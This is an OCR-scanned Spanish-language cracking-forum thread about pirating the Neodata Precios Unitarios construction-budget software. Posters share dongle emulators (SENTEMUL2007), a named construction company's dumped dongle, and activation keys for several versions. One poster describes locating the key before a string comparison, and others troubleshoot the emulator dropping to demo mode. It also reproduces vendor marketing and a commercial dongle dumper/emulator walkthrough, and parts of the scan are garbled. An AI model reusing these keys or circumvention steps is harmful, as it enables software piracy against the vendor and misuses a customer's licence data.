http:/ / sanatas.com/ vb/ showthread.php?t=2175 


Ya lo habia checado, el emulador del 2006 si funciona perfectamente, no se por que se te traba en 
tu maquina o si es nadamas con esa obra que abriste, pero si funciona bien, en el 2008 apenas lo 
estoy probando pero no debe haber problema puesto que el programa no utiliza ninguna funcion 
avanzada del candado asi que no debe haber ningun problema. 


Pues ya encarrerado el ratón ahí les va el nuevo emulador del sentinela del Neodata ke me paso 
un cuate ke es ingeniero y que se lo vendieron en 600 varitos, funciona para las versiones del 
2004 al 2008 y probablemente 2009, básicamente lo ke hace es iniciar un servicio mediante un 
script para emular el sentinela, NO REQUIERE QUE EL NEODATA SEA PARA VERSION EN RED 
COMO EL OTRO EMULADOR pero siempre sale el nombre de una empresa X cuando inicia el 
Neodata (en el video pueden ver como funciona además el archivo viene con un tutorial). 


Archivos adjuntos 

33 emulador terminado.rar (839.3 KB, 427 vistas) 

JAJAJ AJ AJA, no pos ya me ahorraste andar cambiandole el nombre a la empresa, ni para que 
batallamos, de este emulador lo unico que necesitas es el dump o sea el archivo .DNG y la clave 
que te dan en el pdf o sea la 4579175148 no necesitamos crackear nada, utiliza el sentemul2007 
el que esta crackeado por EDGE y es todo, que se chinguen a los weyes de la empresa de 


chipalcingo por pendejos, de seguro su ing. de sistemas es el tal mezcalero-x, pero lo que mas me 
da risa es que el wey edite el sentemul para que lo haga pasar como suyo y le ponga una 
proteccion igual a la del pendejo del serial code 9x y que ya vimos como le podemos dar en su 
madre facilmente con una clave valida, sin clave tambien se puede pero hay que ser muy pirinola. 


como dice sonicblue ya encarrerado. pues aqui esta la clave para que lo utilizen en el neodata 
2006 CLAVE: 98698 la del 2007 todavia no he podido darle en su maiz pero en esas andamos, y 
las anteriores como la del 2003 y 2004 si las necesitan pues me avisan y las saco, no lo hago 
ahorita porque me da hueva buscar el programa. 


De 


ler ET presupuesto Costo: $0,00 Importe: $0,00 28 ca] 
E 5% Presupuesto A A Impo 


0 


$ EA 0 A 
ds RR 


EDIFICIO “A” 0,0000 0,00 € 


= Ácerca de Neodata ES 


Serie del producto: 27460 
Versión monousuario 


NEODATA 


PRECIOS 
UNITARIOS 


1 : 


CONSTRUCTORA INSURGENTES DE CHILPANCINGO, S.A. DE C.Y. 


En caso de dudas comunicarse al (55) 52-78-38-50 


P417M2008R60) 
Versión: 04/jul¿2008 


Thxs Backdoor y Sonicblue 


Con el Sentemul2007 es mas que suficiente. 


Pues despues de ver eso que habian modificado el SENTEMUL, pues me puse a modificar uno para 
que lo usen la gente de SCT, ademas que la verdad en estetica si deja mucho que desear, asi que 
tambien le di un poco de vista y lo compacte mas, espero les agrade. 

Archivos adjuntos 


| Emulador SCT SENTEMUL2007.exe (240.0 KB) 


Bueno y al final pero no por eso al ultimo, la pinche clave del neodata 2007 que como chingados 


me hizo batallar aqui esta " 1034049614: para que ahora si no digan que aqui nos 
pirateamos todo y que no aportamos nada, el mexcalero-x se puede piratear nuestras claves del 
2006 y del 2007 para que las siga vendiendo el ogt, bueno les comento que para sacar la clave de 
este pinche programa olvide lo esencial del ZEN cracking, que es pensar las distintas maneras de 
atacar una proteccion y ya estando inspirado un poco, pues me dije a mi mismo, mi mismo ... no, 
digo, si este programa encrypta la clave antes de compararlas y aunque puedo ver todo el 
proceso de encriptacion de la clave que inserte, nunca encontre de donde chigados sacaba el otro 
valor con el que conparaba la clave en texto unicode, asi que pues logico, la clave la calcula 
despues de leer la info del candado y antes de mostrar la ventana que te pide que insertes la 
pinche clave, y pues papita unos _ vbastrcomp antes esta la clave sin encriptar. 


Bueno con esta me despido dejando este thread completamente concluido. 


pd: Tal vez haga un miniturorial para sacar las claves por si cada quien consigue sus propios 
dumps, o por si tienen los demas modulos como el comercializador de viviendas, etc. y que 
quieran compartir. 


pd2: piquenle en gracias no sean OGTs que ando muy abajo. 


Buenos dias ante todo, pues he qui mi primer aporte, bueno antes de poner dejenme agradecer a 
backdoor, que para mi ha sido un maestro ya que me ha sacado de algunas dudas, bueno gracias 
back, bueno dejenme decirles que despues de que back me dio los tips, me dedique a a insistir 
por mi mismo y he obtenido buenos resultados, aqui pongo la clave para la version 2004, que fue 
obtenida por el smartcheck 


neow2004=302792 


gracias y espero seguir aprendiendo de grandes personalidades aqui en el foro. 


Obra; C:INeow200810brasW!.puó 
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Bueno y al final pero no por eso al ultimo, la pinche clave del neodata 2007 que como chingados 
me hizo batallar aqui esta "1034049614" para que ahora si no digan que aqui nos pirateamos 
todo y que no aportamos nada, el mexcalero-x se puede piratear nuestras claves del 2006 y del 
2007 para que las siga vendiendo el ogt, bueno les comento que para sacar la clave de este 
pinche programa olvide lo esencial del ZEN cracking, que es pensar las distintas maneras de 
atacar una proteccion y ya estando inspirado un poco, pues me dije a mi mismo, mi mismo ... no, 
digo, si este programa encrypta la clave antes de compararlas y aunque puedo ver todo el 
proceso de encriptacion de la clave que inserte, nunca encontre de donde chigados sacaba el otro 
valor con el que conparaba la clave en texto unicode, asi que pues logico, la clave la calcula 
despues de leer la info del candado y antes de mostrar la ventana que te pide que insertes la 
pinche clave, y pues papita unos _ vbastrcomp antes esta la clave sin encriptar. 


Bueno con esta me despido dejando este thread completamente concluido. 


pd: Tal vez haga un miniturorial para sacar las claves por si cada quien consigue sus propios 
dumps, o por si tienen los demas modulos como el comercializador de viviendas, etc. y que 
quieran compartir. 


pd2: piquenle en gracias no sean OGTs que ando muy abajo. 


gracias por las claves, pero en mi rancho dicen que en vez de darle un pescado a una persona, 
mejor enseñale a pescar, yo no soy muy bueno en estos menesteres del cracking, de hecho, entre 
a este grupo por la referencia de la solucion para el neodata 2008, mi papa es ing. civil y llevo 
como 15 años utilizando el neodata, tengo mi llave paralela, pero nunca pude actualizar mi 
version (trabajo en la version pre-windows, imaginense) porque cuando me pasaron la ler 
version windows pues ya venia protegida y te pedia la clave actualizacion, y pues en esa epoca 
nadie se tomaba la molestia de checar estos programas para crackearlos, pero bueno, a mi me 
gustaria ver el tutorial para sacar tus propias claves de activacion de los demas modulos, o para 
tener la clave de activacion de mi propia llave. 


Gracias.... 


el emulador sentemul2007 solo se aplica una vez??? o cada vez que se quiere abrir el neodata 
2008, lo instale puse lo que viene del mezcalero con el emulador y la numeracion que viene en el 
PDF y al parecer todo bien , y tambien como se quita el nombre de la empresa o asi quede en 
definitiva y muchas gracias a todos 


Lo nuevo en Precios Unitarios 2009* 


Lo nuevo en Neodata Precios Unitarios 2009: 

El mejor Cuantificador en 2D y 3D, con operación directa en AutoCAD. Comunicando a los 
generadores de Neodata o a cualquier hoja Excel. 

InteliMat de usuario: Elabore en Excel sus análisis de precios unitarios con las variables que 
usted necesite de manera sencilla y dinámica. 

InteliPre de usuario: Elabore en Excel sus presupuestos y formatos de generadores 
parametrizando las variables que usted necesite, reciba la cuantificación de AutoCAD y traslade 
automáticamente a Neodata PU. 

Esto le permite Cuantificar y presupuestar un edificio de 8 niveles en 1 semana en lugar de 3 
semanas. 


Presentándose yá en 
ExpoCI HAC 2008 


*DISPONIBLE PARA SU DESCARGA A PARTIR DEL MARTES 21 DE OCTUBRE. 


¿Por qué NEODATA Precios unitarios? 

Somos el software más utilizado en México, especialmente en las empresas líderes. 

Somos el software estándar para PEMEX, CFE y otras dependencias. 

Cálcula en menos de un minuto presupuestos de cualquier tamaño. 

100% de reportes propuesta técnica y económica con los formatos de las dependencias más 
comunes y con un reporteador integrado para que usted adapte sus propios reportes. 

Incluye sin costo adicional: base cotizador con 5,000 matrices y mercadeo de 25,000 insumos en 
el DF y 8,000 insumos en 30 ciudades. 

Incluye InteliMat (matrices inteligentes): Sistema capáz de generar millones de tarjetas de 
precios unitarios. 

Incluye Intelipre (presupuestos inteligentes): Matrices, generadores y presupuestos automáticos. 
Incluye NeodataCAD (del proyecto al presupuesto): Biblioteca de dibujos con matrices integradas 
y sistema para relacionar la base de precios unitarios del usuario a cualquier proyecto. 

Incluye el apoyo de un foro de soporte técnico donde se responden tanto dudas en la operación 
del sistema, como dudas sobre la ley y reglamento de obras públicas. 


Funciones a detalle 


Cuantificador integrado. 
Con la instalación de NEODATA Precios Unitarios, usted puede abrir planos en formatos de 
AutoCAD, cuantificarlos, y de forma automática pasar los resultados a generadores. 


Generadores. 

Se incluyen prácticamente el 100% de los formatos de generadores utilizados en México, los 
cuales reciben el resultado de la cuantificación, consolidan la información en una hoja resumen 
que se comunica al presupuesto y se preparan hojas de impresión como soporte documental. 


Elaboración de presupuestos. 


Todas las funciones requeridas para elaboración de presupuestos: 
Matrices, insumos, Costos horarios, FASAR, Indirectos, Financiamiento, etc. 


100% de reportes de concursos de obra pública. 
Modificables por el usuario utilizando nuestro reporteador integrado o enviando la salida del 
reporte a Excel para darle formato. 


Ruta crítica. 
Para una planeación a detalle de las actividades de la obra y reportes de programa de obra como 
soporte al concurso. 


Estimaciones y Escalatorias. 
Para complementar el control de estimaciones de la obra y el cobro a las dependencias oficiales. 


Importe su información previa. 
Importamos de Opus, Opus Ole, Opus AEC, SAI CIC, Campeón y Campeón Plus. 


Cotizador: Actualización mensual de costos por Internet. 

InteliMat: Matrices inteligentes. 

InteliPre: Presupuestos inteligentes. 

Base Cotizador. 

Descargable de nuestra página web en dos versiones: 

Cotizador D.F.: 

Con 5,000 matrices y 25,000 insumos. 

Cotizador 30 ciudades. 

Con 5,000 matrices y 8,000 insumos con mercadeo en 30 ciudades de la República Mexicana. 


InteliMat (desde 2004) 

Se alimentan parámetros tales como: largo, ancho, tipo de concreto, cantidad y tipo de acero, 
etc., y se obtiene en automático la matriz con el análisis de precios. 

Esta matriz se incorpora al presupuesto que está elaborando tal cual como si la hubiera 
capturado o importado de un maestro. 


Amplia cobertura, incluyendo: 

Edificación: 

Cimentación, Estructuras de Concreto y Acero, Albañilería, Herrería, Carpintería, Aluminio, 
Domos, Cristales, Muros, Acabados, Losetas, |mpermeabilizantes, Muebles de Baño, Mamparas. 
Instalaciones: 

Hidrosanitarias, Eléctricas, Ductos de Lámina, Pararrayos y Soportería. 

Carreteras: 

Desmontes, Despalmes y Excavaciones. 

Urbanización: 

Drenaje y Agua potable. 


InteliPre (desde 2004) 

Mediante parámetros obtenga en automático partidas completas del presupuesto y los 
generadores de soporte. La cobertura total de InteliPre es: 

Preliminares: 

Demoliciones, Trazo y nivelación, Excavación, Recimentaciones, Cortes y rellenos. 
Cimentación: 

Pilas, Zapatas, Contratrabes, Losa de cimentación, Muros de contención, Columnas y castillos, 
Cisterna, Cisterna y parcial. 

Estructura de concreto: 

Entrepisos, Columnas y muros PB, Losa nervada y simple, Rampas, Losas planas, columnas, 
trabes y muros PA. 

Albañilería: 

Cadenas, Castillos, Muros y Aplanados. 

Carpintería: 

Libreros. 


Aluminio: Ventanas Fijas, corredizas y de protección. 
Acero soldable: Tuberías y conexiones. 

Ductos de lámina 

Mamparas de Sanilock 

Tablaroca 


NeodataCAD: Proyecto integral desde AutoCAD al presupuesto. 
Puede operar de tres maneras: 


1. Utilizando nuestras bibliotecas con más de 5000 dibujos para integrarlos a sus proyectos en 
AutoCAD. 

2. Tomando sus planos previamente dibujados y asignándoles nuestros códigos. 

3. Preparando un maestro propio con ensambles y asignándole estos códigos a los elementos del 
plano. 


En todos los casos obtenga en automático su presupuesto. 
En caso de que las dimensiones del plano cambien, al abrir de nuevo su presupuesto en 
NeodataCAD el presupuesto se actualiza. 


Asi es señores el dia de hoy me tope con la noticia de que van a liberar una nueva version del 
Neodata, no le veo ninguna caracteristica nueva (de hecho desde el 2004 no ha cambiado mucho) 
lo unico pues es que a los usuarios que tienen su llave fisica pues les van a cobrar la actualizacion 
del sistema, y me imagino que van a quitar el soporte de la base de datos del intelipre, intelimat y 
del cotizador de las versiones de 2007, (actualmente dan las actualizaciones solo para la version 
2007 y 2008). 


A mi me gustaria aprender a encontrar los numeros de serie para las actualizaciones, ya que con 
la emulacion de la llave, pues el unico inconveniente para cambiar la version con la que 
trabajamos es conocer el no. de serie que genera el programa para cada una de las 
actualizaciones. 


Espero que algun alma caritativa colgara un tutorial o me echara un cable para saber por donde 
puedo atacarlo.... 


gracias. 


Hola buenas tardes, he probado la version 2009 y el software, se encuentra un cambio relevante, 
en este caso ya no puede ser emulado con el sentemul, he intentado hacerlo con el toro emulator 
y nada, asi que piendo que los de neodata se dieron cuenta de que se podia emular facilmente su 
programa y me imagino que hicieron algo por ahi, a los compañero del foro si alguien tiene 
noticias de avances o algo interesante que lo comunique, asi tambien yo estare en contacto con 
ud. 


Primero que nada aclaro que no soy un hacker y la mera verdad no tengo ni idea de por donde 
empezar a destripar un programa para conseguir las claves y demas, y ante tanto experto en el 
tema hasta uno se siente inutil. Pero bueno, lo que si soy es un usuario de sus cracks y 
emuladores, caso especifico el del neodata, por lo cual agradezco a todos los que hayan tenido 
algo que ver en su desarrollo. Pero... 


Sigh, siempre hay un pero..., se me hace que ademas de todo tambien estoy medio pendejo por 
que es bastante obvio que funcionandole a tanta gente algo estoy haciendo completamente mal 
por que a mi no me funciona como es debido. Explico. 


El archivo me llego con un instructivo en word explicando paso a paso lo que uno debe de hacer 
para hechar a jalar el progrma. al final dice que agradescan al Sanatas Cracker Team (gracias!) y 
que no dejen que un OGT lo venda (too late, yo solte 200 pesos por el, pero bueno, eso es harina 


de otro costal). volviendo al tema, segui las instrucciones al pie de la letra y el progrma funciono 
a la perfección...por 10 min. 


Exactamente a los 10 min el programa me dice que son demasiados registros parala version 
demo y se trabajara en modo visor, y de ahi no paso. si lo apago y lo vuelvo a encender le puedo 
seguir agregando registros, os ea que no tengo limite por ese lado, pero nuevamente a os 10 min 
se vuelve a bloquear. 


Alguien me puede epxlicar en donde la estoy regando? les anexo una breve descripcion de los 
pasos que hice para instalarlo. 


1. Instale el neodata 2008, no lo prendi 

2. heche a nadar el emulador (por cierto es el de Sanatas) 

3. carge el driver 

4. le di actualizar licencia. 

5. en dongles carge un archivo que venia adjunto 

6. me dice que tengo licencia PRO 

7. ejecute el neodata y le di la clave correspondeinte (gracias const de chilpancingo, hehe) 


listo, feliz por 10 min. 


les agradeceria cualquier ayuda. 


Es chistoso ver como pagan ah extraños por los cracks que aqui se crean y en vez de reclamarle o 
pedirle ayuda al que se los vendio caen aqui queriendo que se les solucione el problema, ya lo 
dijo por ahi Sanatas una vez, que hasta reclamos en su correo personal recive. 

Redsteel, ya leiste de perdida todo el thread? 


mira lo que puedes aser es formatear la computadora, descargar e instalar el service pack 3 y 
todas las demas actualizaciones recomendadas para el windows xp y vuelve a instalar el neodata 
como indica el tutorial, yo lo tengo instalado el neodata con windows original y no me a dado 
problemas. 


que tal chavos muchisimas gracias por este gran aporte del emulador de neodata 2008, ya lo baje 
lo intale y lo estoy provando ya le encontre un detalle cuando se quiere jalar insumos del 
catalogo maestro se puede hacer pero en un tiempo de +- 5 min aparece un mensaje que se han 
jalado demasiados conceptos y que empezará a trabajar en modo visor (MODO DE PRUEBA) y 
efectivamente se bloquea la inserción de nuevos insumos para lo que se debe cerrar la obra y el 
neodata y volver abrir y se vuelve a activar pero se vuelve ciclico el error, ojala le puedan hechar 
un vistazo a esto. 


saludos 


beto 


Bueno gracias por el comentario, tengo instalado el windows xp sp3 y antes se formateo la 
computadora y suceso este detalle del emulador. 


Buenas tardes comunidad, luego de ausentarme unos dias de mi maquina... 
Leyendo sus experiencias con el programa ahi les va la posible razon: 


Miren, si no me equivoco a quienes tienen este problema con el emulador habran instalado la 
ultima revision del neodata 2008 creo que salio a principios de octubre (aunque en los detalles de 
la version dice que es version del 17 de septiembre, nisiquiera eso cambiaron esos cuates). 


Bueno señores, hasta por lo que he visto el problema lo ocaciona unicamente esa revision que 
menciono, yo tambien empece a tener el mismo problema, desinstale esa revision, instale una 
revision anterior (la que en verdad salio el 17 de septiembre) y hasta ahora llevo mas de 1 hora 
con el programa abierto y no me ha tirado ese dichoso mensaje y no se ha pasado al modo visor 
(deduzcan la razon de esto, un intento desesperado...). 


El problema tal vez no es con su windows si es pirata u original o actualizado o sin actualizar, yo 
ya lo probe con un windows de los mas piratas que existen jeje, y con un windows original con 
todo y service pack 3 instalado. 


Esta es mi experiencia, ustedes intentenlo y comenten como les fue. 


La version 2008 en la pagina de neodata ya paso a la seccion versiones anteriores y segun ellos la 
revision que tienen alla es del 10 de julio por lo que quiero creer que en esta no se presentara 
este problema. 


Yo no he probado si efectivamente es la revision del 10 de julio esa, pero uds. que tienen el 
tiempo y el ancho de banda disponible, descarguenlo, desinstalen la version que tienen e instalen 
esta para checarlo, les dejo el link al final del post. 


Espero les sirva de algo esta pequeña letania que ya me eche porque ando con algo de hueva 
para escribir jajaja. 


Saludos!. 


Segun unos post arriba dicen que el emulador no funciona para esa version. 

Seguramente esos cuates habran bloqueado unicamente ese dongle, digamos que lo "banearon", 
creo yo que seria una aberracion que se dediquen a cambiarles las llaves sentinelas a todos sus 
clientes para que ya no sea emulado, pero bueno eso es lo que yo creo, ellos saben lo que hacen. 


Si se emula otra llave tal vez funcione para esta version, obteniendo la clave de acceso 
obviamente para 2009. 


Efectivamente, tienes toda la razón a mi me había sucedido exactamente lo mismo, pero no lo 
había comentado. 


Segun unos post arriba dicen que el emulador no funciona para esa 
version. 

Seguramente esos cuates habran bloqueado unicamente ese dongle, 
digamos que lo "banearon", creo yo que seria una aberracion que se 
dediquen a cambiarles las llaves sentinelas a todos sus clientes para que 
ya no sea emulado, pero bueno eso es lo que yo creo, ellos saben lo que 
hacen. 


Si se emula otra llave tal vez funcione para esta version, obteniendo la 


clave de acceso obviamente para 2009. 


Si ojalá alguien pueda conseguir un dongle para la versión 2009, yo espero algún tutorial de 
Backdoor_b para sacar las claves. Por cierto, ayer me encontré en donde venden discos piratas el 
Neodata 2008 con el emulador que posteamos aquí en el SCT, a ver si luego no vienen los 
reclamos como lo que pasó con el Opus. 


Gracias RENAV por el tip, pero vengo siguiendo todos los pasos desde hace dias y tengo el mismo 
problema que comentan los otros compañeros. Baje el Neodata 08 desde el link que nos diste, 
pero es exactamente la misma version que existe en la pagina oficial de neodata, (que por cierto 
esta version es la unica que existe en el portal oficial, ya no existe otra version anterior para el 
2008) y so sorry soy feliz nada mas 10 min. en mis presupuestos. Ya intente casi de todo, 
reinstalando, reiniciando 2 o 3 veces mas, guardando estado, cerrando licencia, etc...... 
instalando y desinstalando el sp3, yaaa no se que mas hacer. 

Bueno dice el dicho "lo que facil biene...... en 10 min se va" jajajaja. 

Muchas Gracias a Todos por el esfuerzo. 


Necesitamos que quien tenga el PU2008, antes de la fecha de septiembre, lo suba al portal para 
poder bajarlo y asi seguir utilizandolo, quien lo tenga se lo agradeceriamos ya que somos muchos 
quienes lo estamos necesitando 


Me podrian decir textualmente como dice ese mensaje de los 10 minutos, ponganme el tityulo de 
la ventana y contenido, porque yo abri la obra de prueba y la deje abierta toda una noche y nunca 
me mando nada de mensajes. 


el mensaje se despliega en una tipica ventana de información de windows con el titulo de: 
Neodata 2008. 


La leyenda exacta dice: Demasiados registros para la versión demo. Se trabajara en modo visor. 


y viene el botoncito de [aceptar] 


Eso es todo, por cierto la version del link es la de julio 2008. con esta el mensaje aparece a los 5 
minutos, ya no a los 10, voy a quitarla y poner la mas nueva y veríifico. 


---Despues de cambiar la version de julio por la de septiembre el mensaje es exactamente el 
mismo pero aparece hasta los 10 minutos. 


En efecto a mi me paso lo mismo en vez de 10 min son 5 min lo que dura. 
Concuerdo en que alguien que tenga la version anterior del 2008 la suba por fassss. 


Y observando el post anterior: Si cuando abres el presupuesto de ejemplo no te manda la leyenda 


de "demasiados registros" asi dures 3 horas en el. 
A menos que vayas introduciendo mas registros y llegues al tope aunque sea el que trae de 
ejemplo pasando 10 min te saca. 


Resumen: "alguien suba la version primera del 2008" 


gracias a todos. Por el esfuerzo 


Hola que tal yo tengo instalada la version de septiembre de neodata 2008 y no tengo ningun 
problema yo podria ayudarles solo posteen sus dudas siento que puede ser el controlador del 
sentinela o en su caso que no tengan el service pack 3 o el net framework 3.5 no lo se en mi caso 
primero instale la version de julio funciono perfecto y posteriormente instale como actualizacion 
la de septiembre y siguio funcionando saludos 


Alguien ha probado si sucede lo mismo con la version 2007, para los que les incomoda estar 
cerrando y abriendo a cada rato el programa tal vez les sea mejor trabajar con esa version, 
aunque si tienes el service pack 3 instalado van a tener que desinstalarlo porque les puede crear 
errores. 


Despues de actualizar controladores e instalar el NET Framework 3.5 el resultado es exactamente 
el mismo, a los 10 min tienes version demo. 


Vale la pena mencionar que el emulador en ocasiones marca "licencia expirada", esto no es 
siempre pero aparentemente despues de los 10 min cuando el neo208 te cambia a demo esto 
afecta tambien al emulador. Esto no es constante pero si lo he llegado a apreciar en algunas 
ocasiones. 


Despues de tanta prueba he llegado a las siguientes conclusiones: 


1. El emulador funciona al momento de cargar el programa de forma que uno puede ingresar el 
codigo de la empresa y empezar a trabajar sin problemas. 


2. La version de julio hace un chequeo de la llave a los 5 min, el emulador por alguna razon no es 
identificado y cambia version demo. 


3. En la versión de septiembre tenemos dos opciones, una es que el emulador pasa el primer 
chequeo a los 5 minutos pero de alguna forma queda inactivo por lo que no pasa el segundo 
chequeo a los 10 minutos y te manda a demo. La otra opción es que hayan cambiado el tiempo de 
chequeo de la llave a 10 minutos con lo cual el resultado es ya conocido. "Demasiados registros, 
se trabajara en versión demo" 


A lo mejor esto es demsiado ovbio pero para los que estan buscando una solucion y no tienen el 
problema en primera mano tal vez esta información pueda ayudarles en algo. 


pues al parecer amigo el problema esta en tu emulador que se desactiva y por consiguiente 
neodata chequea y localiza que no hay ninguna llave y cambia a version demo aqui lo que 
podemos hacer es que bajes el emulador que esta posteado aqui mismo que se llama 
SENTEMUL2007.exe esta en alguna de las primeras paginas despues abre el sentemul tiene 3 
pestañas en la pestaña driver le das instalar y seleccionas inicio automatico posteriormente te 


pasas a la pestaña dongles y le das cargar, carga el dongle o archivo dump y te pasas a la 
pestaña emulador y le das empezar servicio y listo tienes neodata 2008 en ese orden cualquier 
prueba y describes el comportamiento del programa 


Trojan, creeme que eso fue lo primero que hice, baje el emulador posteado en el sitio y segui las 
indicaciones al pie de la letra. Ademas como podras apreciar en los diversos posts no soy el único 
con el problema sino que habemos varios en exactamente la misma situación. 


Aún asi se agradece la recomendación ya que en ocasiones las opciones mas sencillas son las que 
se pasan por alto y luego son las que funcionan. 


Considero que quien tenga la version del NEO y le funcione con el emulador al 100% sin irse a 
demo nos lo suba para poder bajarlo, seguiremos haciendo esfuerzos gracias por los comentarios 
a todos 


Señores buenas tardes, 

repasando todos los puntos de principio a fin y con ganas de hechar a andar el dichoso neodata 
2008, existe un punto pequeñisimo que alomejor a mas de alguno le ha pasado y hemos omitido 
mencionar a cerca del emulador: 


Es que cuando por primera vez lo hechas a andar en la pestaña del DRIVER y le presionas instalar 
DRIVER, que como que se traba, y ya no deja colocarte con el puntero o en el circulo negro en la 
opcion de | NI CI AR AUTOMATICAMENTE de hecho no puedes hacer click en el boton de GUARDAR 
ESTADO, no se si es asi o solo a mi me pasa en todas las compus que he intentado. 


Entonces lo que he estado haciendo siempre es 

1 abrir el emulador, instalar el driver ( se traba unicamente la primer pestaña "driver") 

2 cerrarlo 

3 abrirlo de nuevo y ya se habilitan todas la opciones, doy en INICIAR AUTOMATICAMENTE Y EN 
GUARDAR ESTADO 

4 EMPEZAR SERVICIO 

5 cargar el archivo dump y actualizar licencia, 


6 corro Neo Data 2008 y guaaaaala Neodata por 10 min nada mas. 


Pregunta: a alguien le pasa lo mismo que a mi? 
alguien me puede ayudar? 


Nota: el emulador y los complementos los he bajado de los post anteriores. 
VUELVO A AGRADECER A TODOS POR SU INTERES..... 
MUY BUEN DIA. 


Hola a todos, 

He estado siguiendo este tema del Neodata 2008 y el emulador de sentinel, y he hecho 
exactamente lo mismo que lo que decribe deiv7 con los mismos resultados. Es frustrante 
escuchar que a otros les funciona bien y a uno pues simplemente no. Eso de tener que cerrar el 
programa cada 10 minutos es bastante aburrido. 

Al echar a andar el emulador detecte el mismo problema de deiv7, sin embargo lo cerré y lo volvi 
a correr y entonces seleccione la opcion de Inicio Automatico y Guardar Estado, me regrese a la 
pestaña de Emulador y le di Actualizar licencia, pero nada. 

Otro pequeño detalle en el que he reparado es que al abrir el Neodata, pareciera que cargara la 
ventana dos veces, aunque el programa solo se abre una vez. Igualmente cuando aparece el 
mensaje que anuncia que el programa cambiara a modo visor o demo, aparece dos veces el 
mismo mensaje de Windows. 

Aprovecho para darles las gracias por todas las cosas interesantes que comparten. Yo solo soy 
Ingeniero Civil, pero este tema me gusta mucho. Gracias Sanatas por compartir tu conocimiento. 


A todos en general. 
Seguire pendiente de este tema. Saludos 


AMIGO, COMO SE MENCIONO ANTES TU PROBLEMA ES EL EMULADOR, YO LO TENGO TRABA) ANO 
EL NEODATA 2008 DESDE HACE VARIOS MESES Y SIN NINGUN PROBLEMA. HONESTAMENTE NO 
HE PROBADO EL EMULADOR DE SANATAS, PERO AL PARECER ES EL SENTEMUL FIXEADO Y DEBE 
FUNCIONAR BIEN, VEI FICA TU EMULADOR QUE NO SEA DEMO, QUE SEA FIXEADO 


EL ORIGINAL LO VENDEN AQUÍ 


http://www.neobit.org/emulators.phtml 


nos Software security professionals at neoBit.org have 


+  Emtates HASPI, HASP4 and developed reliable and user-friendly emulators for 
HASP HL USS and LPT dongles HASP, HARDLOCK FAST E-Y-E and Safe-Net (ex- 

e Transparent tor haraware heys Rainbow) Sentinel dongles. 

e  Doesnt change anthing win the 
sofware 


Dongle emulator is a low-lewel driver that intercepts protection 
calls and returns correct values, so protected software works just 
like original hardware key ¡is attached. 


There are two types of licensing available: 
+ Single license; 
+ Unlimited license; 


Single license allows to use dongle emulator on one computer 
only; 


Unlimited license allows to use dongle emulator for specified 
dongle on any computer; 


O Sentinel Dongle emulator 
HASP dongle emulator: 
e  Emulates Safe-Net (ex-Ralnbow) 
Sentinel SuperPRO, Ultra dongles + Emulates HASP3, HASP4, HASP HL and HASP SRM dongles family 


. a for LPT or USB ports 
sofware e  Alltypes ofHASP keys are supported: HASP, MemoHASP, NetHASP 


and TimeHASP 

+  Nolimitation on quantity of supported programs 

e Transparent for other dongles. You can use emulator and original 
hardware key at the same time 

+ Doesn't change anything within software and doesn't replace original 
driver 

e Different type of licensing allows installation of emulator on specific 
computer or without limitation depends on requirements 


CLICK HERE to read more about HASP dongle emulator. 


Sentinel dongle emulator 


SoftKkey e  Emulates Safe-Net (ex-Rainbow) Sentinel SuperPRO, UltraPRO, PRO, 

4 CPlus, Scribe dongles family for LPT or USB port 

+  Nolimitation on quantity of supported programs 

e Transparent for other dongles 

e Doesn't change anything within software and doesn't replace original 

' driver 

UN im! e Different type of licensing allows installation of emulator on specific 
computer or without limitation depends on requirements 


Oftware-key. org 


We accept: 


PERO HAY UNO QUE CIRCULA EN LA RED, ES FIXEADO POR EDGE, ME | MAGI NO QUE ES EL QUE 
ESTAS USANDO DEBE FUNCI ONARTE. O EN CASO CONTRARIO VERIFICA TU EQUIPO SI NO TINE 
VIRUS. (TE RECOMIENDO KASPERKY 2009) 


Removing HASP HASP4 HASP HL dongles 
HASP dongle dumper/ emulator 


Emulates HASP3, HASP4 and HASP HL dongles 

All types of HASP keys are supported: HASP, MemoHASP, NetHASP and TimeHASP 

No limitation on quantity of supported programs 

Transparent for other dongles. You can use emulator and original hardware key at the same 
time 

e Doesn't change anything within software and doesn't replace original driver 

. Free support and updates 


Step-by-step instruction. 
Step 1. Downloading 


Please download HASP/ Hardlock dongle dumper from: 


HASPHL2008.ZIP (2.6mb) 


You can find most recent version of HASP HL, HASP SRM dongle emulator at DongleService.com 
Itis also necessary to have latest HASP / HASP HL dongle driver installed. We offer you to download 


latest HASP dongle drivers from: 


http:/ / www.ealaddin.com/ support/ hasp/ enduser.asp 
File is called "HASP HL driver setup" 
Step 2. Start dumper 


First of all unpack dumper.zip in any folder and run HASPHL2008.exe on machine that has latest 
version of HASP dongle drivers installed and original HASP key connected to LPT or USB port. 


Step 3. Service installation 
HASP/ Hardlock dumper and emulator designed as low level kernel mode driver and requires 


Administrators privileges to be installed. 
When you start HASPHL2008.exe for a first time you'll see following window. 


Driver Startup options 


Install Driver 
(Automatic Start 


| (+ Manual Start 
Save State | 


Driver status 


Status : Driver is not installed or cannot be started, 
Please try to INSTALL service 


Press "INSTALL" button and if installation was successful Driver status window will be changed to 
"Status : driver is installed" 


Step 4. Starting service 


Now you need to open "Emulator" folder. 


ES HASP/Hardlock Emulator 2006 


Emulator | Driver | Dumper 


License Licensed Donales 


Computer ID | 


HASPHL2006 Status 
HASP/HARDLOCK Emulator service is stoped 


Then you press "Start Service" button. |f everything is ok you'll see 


Computer ID | AZAA25F1656F92B2AAC873FA1BBFIA9O 


HASPHL2006 Status 


HASP/HARDLOCK Emulator service is running 
NOT Licensed 


Step 5. Running your software 
To find your key it is necessary to start protected software. 
Step 6. Readign your key. 


Open "DUMPER" folder. 


(es HASP/Hardlock Emulator 2006 


HASP/HL Dongles 
Dump 


mo | 3C39:2540 


Refresh 


Dumper status 


HASP/ HL Dongles window shows logged HASP passwords. There can be up to 10 different passwords 
but it doesn't mean that all dongles are connected to computer. 
When you press "DUMP" button Dumper will try to read all of Logged dongles and save all dump files. 
Dump files are stored in folder containing HASPHL2008.exe and have ".DMP" extension. (In our 
example created file is called 3C3925A0.dmp ) 

If there are no HASP passwords press "REFRESH" button. If it doesn't help and "DUMP" button is still 
disabled it means your software doesn't work with HASP and uses different kind of dongle brand or 
doesn't use low level drivers (usually old DOS or WIN16 software doesn't use HASP drivers) 


Step 7. Sending dumps and getting trial version 


Please send created dump files to 

We'll send trial version of HASP dongle emulator as soon as get your mail. Usually it doesn't take 
more than 24 hours. Trial version has one week time limitations but it is enough to make sure your 
software can perfectly work without hardware key attached to computer. 


Step 8. Everything works and you decide to purchase full unlimited version 


